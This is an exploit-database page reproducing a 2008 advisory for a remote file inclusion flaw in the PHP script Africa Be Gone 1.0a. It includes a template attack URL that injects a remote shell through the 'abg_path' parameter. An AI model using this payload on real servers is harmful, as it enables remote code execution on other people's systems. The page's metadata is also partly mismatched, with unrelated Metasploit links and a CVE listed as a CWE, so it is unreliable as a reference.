header-logo
Suggest Exploit
vendor:
Africa Be Gone
by:
Lo$er
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Africa Be Gone
Affected Version From: 1.0a
Affected Version To: 1.0a
Patch Exists: No
Related CWE: CVE-2008-3790
CPE: a:africabegone:africa_be_gone
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-3790/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-3790/https://www.rapid7.com/db/vulnerabilities/apple-osx-ruby-cve-2008-3790/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-3790/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0897/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Africa Be Gone version 1.0a Remote File Inclusion

Africa Be Gone version 1.0a is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code. This code is then executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated.
Source

Exploit-DB raw data:

=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]

Navigation

Suggest Exploit

Services By CQR